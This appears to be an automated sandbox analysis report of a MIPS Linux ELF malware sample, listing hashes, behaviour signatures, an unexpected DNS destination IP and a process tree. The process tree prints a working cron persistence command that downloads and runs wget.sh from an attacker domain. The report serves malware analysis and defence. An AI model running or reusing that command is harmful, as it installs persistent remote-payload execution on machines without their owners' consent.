Analysis
- max time kernel: 151s
- max time network: 142s
- platform: debian-12_mipsel
- resource: debian12-mipsel-20240221-en
- resource tags: arch:mipsel, image:debian12-mipsel-20240221-en, kernel:6.1.0-17-4kc-malta, locale:en-us, os:debian-12-mipsel, system
- submitted: 27-10-2024 02:54
Static task: static1
Behavioral task: behavioral1
Sample: cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
Resource: debian12-mipsel-20240221-en
General
- Target: cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
- Size: 87KB
- MD5: 353a49ca2c9b8b35fb036b2de1587fc4
- SHA1: e5cd1ab8dc2c224a5b82113a41ec46479895ae27
- SHA256: cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
- SHA512: 8a47f0d0a8899d153cf80d5579d7ca8f81b9efe9daf93a2f60f72d5ad1ed77a360f3ff6f93cad6b016a52ec6a6f76b94bf2d427f6d9eda0bc5f7cf609e6fd484
- SSDEEP: 1536:GJTjy914iDyIV6n30taWKqlpbfc/SLuZ++5+BJoK+mcS/:GJTj614NNczc/0ublmx
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 1 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
- Renames itself (1 IoCs)
  Processes:
    PID 744: cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
- Unexpected DNS network traffic destination (1 IoCs)
  Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  IoCs:
    Destination IP: 152.53.15.127
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes:
    crontab: file opened for modification /var/spool/cron/crontabs/tmp.wB9D8g
- Changes its process name (1 IoCs)
  Processes:
    PID 744 (cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf): changes the process name, possibly in an attempt to hide itself, to [watchdog/0]
- Reads runtime system information
  Processes:
    cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf: file opened for reading
      /proc/769/status
      /proc/770/status
      /proc/1/cmdline
      /proc/747/cmdline
      /proc/762/status
      /proc/764/status
      /proc/768/status
      /proc/715/cmdline
      /proc/771/status
      /proc/773/status
      /proc/758/status
      /proc/759/status
      /proc/713/cmdline
      /proc/766/status
      /proc/760/status
      /proc/772/status
      /proc/761/status
      /proc/22/cmdline
      /proc/763/status
Processes
-
/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf (depth 1)
  Command line: /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
  PID: 744
  - Renames itself
  - Changes its process name
  - Reads runtime system information
  -
  /bin/sh (depth 2)
    Command line: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    PID: 746
    - File and Directory Permissions Modification
    -
    /usr/bin/crontab (depth 3)
      Command line: crontab -
      PID: 750
      - Creates/modifies Cron job
    -
    /usr/bin/crontab (depth 3)
      Command line: crontab -l
      PID: 751
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 306B
- MD5: bfd2089040b748f688b70470021d4d43
- SHA1: c2a6fac8ce436a014bb4149d14d7853259b9323c
- SHA256: cfb81f43363ede429f69a6c15d63fbfdb87246bd92fc6a55a189c1001bfb4b3b
- SHA512: 4aee0c647992fff8bc38624556617e8b78523f37f9169ecc32dbc303821881cf90f1fdccc9add3cfc06b6089a8f8e17878173f132a16db77cb152869c2ea487e